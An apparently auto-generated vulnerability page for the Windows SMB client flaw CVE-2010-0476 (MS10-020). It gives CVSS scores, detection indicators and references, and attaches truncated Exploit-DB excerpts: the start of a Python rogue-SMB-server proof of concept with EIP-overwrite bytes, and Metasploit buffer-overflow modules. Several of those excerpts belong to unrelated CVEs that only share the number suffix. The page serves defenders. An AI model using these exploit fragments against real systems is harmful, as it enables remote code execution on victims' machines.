CVE-2010-0476
published 2010-04-14
Priority: P2 · 63 · critical · CVSS 2.0: 10
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 34.33% (98.2nd percentile)
The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability."
Detection & IOCs (extracted from sources)
- command: SMB Trans2 QUERY_FS_INFO response with oversized/malformed parameter block triggering stack overflow
- bytes: FF 53 4D 42 72 (SMBv1 Negotiate Protocol Request/Response magic)
- bytes: FF 53 4D 42 32 (SMBv1 Trans2 command 0x32 malicious response packet)
- A rogue SMB server (or MitM) responds to SMB client Negotiate (0x72), SessionSetup (0x73), TreeConnect (0x75), NTCreate (0xa2), and Trans2 (0x32) in sequence; the malicious Trans2 QUERY_FS_INFO response triggers the overflow. Detect an inbound SMB server response on port 445 containing SMB command byte 0x32 with anomalous parameter/data lengths.
- The exploit operates as a rogue SMB server listening on TCP/445; monitor for unexpected hosts acting as SMB servers (i.e., sending SMB responses rather than requests) on port 445, especially in client-to-server traffic flows.
- The crafted Trans2 response packet (packetrans) contains the byte sequence 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 followed by 02 61 and repeated 0x42/0x41 bytes (EBP/EIP overwrite pattern); this padding pattern in an SMB Trans2 response body is a strong indicator of exploitation.
- The vulnerability affects SMBv1 and SMBv2 client response parsing; block or alert on outbound SMB client connections (TCP/445) to untrusted external hosts, as exploitation requires the Windows SMB client to connect to an attacker-controlled server.
- The PoC was tested only on Windows 7 and Windows Server 2008 R2, while CVE-2010-0476 per NVD also affects Windows Server 2003 SP2, Vista Gold/SP1/SP2, and Server 2008 Gold/SP2; EBP/EIP offsets and shellcode would need adjustment per target OS/SP.
CVSS provenance
- nvd · v2.0 · 10.0 · CRITICAL · AV:N/AC:L/Au:N/C:C/I:C/A:C
- vendor_redhat · 7.4 · HIGH
GHSA
GHSA-9mq3-v894-gjm6 · ghsa_unreviewed · 2022-05-02 · CVE-2010-0476 [HIGH]
The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability."
Red Hat
CVE-2010-0430 [HIGH] libspice: Insufficient guest provided memory mappings boundaries validations · vendor_redhat · 2010-03-30 · CVSS 7.4
libspice, as used in QEMU-KVM in Red Hat Enterprise Virtualization Hypervisor (aka RHEV-H or rhev-hypervisor) before 5.5-2.2 and possibly other products, allows guest OS users to read from or write to arbitrary QEMU memory by modifying the address that is used by Cairo for memory mappings.
Statement: The CVE-2010-0430 issue was fixed in the kvm packages for Red Hat Enterprise Linux 5 via RHSA-2010:0271, and fixed in the rhev-hypervisor package via RHSA-2010:0476. This CVE was not disclosed at the time the errata were released; therefore, it was not mentioned in them.
No detection rules found.
Exploit-DB
CVE-2006-0476 Winamp - Playlist UNC Path Computer Name Overflow (Metasploit) · exploitdb · 2010-04-30
---
##
# $Id: winamp_playlist_unc.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Winamp Playlist UNC Path Computer Name Overflow',
'Description' => %q{
This module exploits a vulnerability in the Winamp media player.
This flaw is triggered when a audio file path is specified, inside a
playlist, that consists of a UNC path with a long computer name. This
module delivers the playlist via the browser. This module has only
been successfully test
Exploit-DB
CVE-2010-0477 [CRITICAL] Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC) · exploitdb · 2010-04-17 · CVSS 9.0
---
import sys,SocketServer
# Windows 7/2008R2 SMB Client Trans2 stack overflow (MS10-020)
# Date: 17/04/10
# Author: Laurent Gaffié
# Tested on: Windows 7/2008R2
# CVE: CVE-2010-0270
# Full advisory: http://seclists.org/fulldisclosure/2010/Apr/201
# More information: http://g-laurent.blogspot.com/2010/04/ms10-020.html
#
# Note from Exploit-DB: It has been reported to us that CVE-2010-0020 also applies
#
EBP = "\x42\x42\x42\x42"
EIP = "\x41\x41\x41\x41"
packetnego = (
"\x00\x00\x00\x55"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\xf
Exploit-DB
CVE-2009-0476 Audiotran 1.4.1 - '.pls' Local Stack Buffer Overflow (Metasploit) · exploitdb · 2010-01-28
---
##
# $Id: audiotran_pls.rb 8306 2010-01-28 21:04:01Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
PLS file within a browser, when the PLS extention is registered to Audi
Exploit-DB
CVE-2009-0476 Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Local Buffer Overflow · exploitdb · 2010-01-10
---
#!/usr/bin/ruby
#
# Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
# Date : January 9th, 2010
# Author : Sébastien Duquette
# Software Link : http://www.e-soft.co.uk/Audiotran.htm
# Version : 1.4.1
# OS : Windows
# Tested on : XP SP2/SP3 En (VMware)
# Type of vuln : Stack Overflow / SEH
# Greetz to : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
#
banner =
"|------------------------------------------------------------------|\n" +
"| __ __ |\n" +
"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n" +
"| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n" +
"|
References
- http://secunia.com/advisories/39372
- http://www.securityfocus.com/bid/39336
- http://www.us-cert.gov/cas/techalerts/TA10-103A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-020
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6918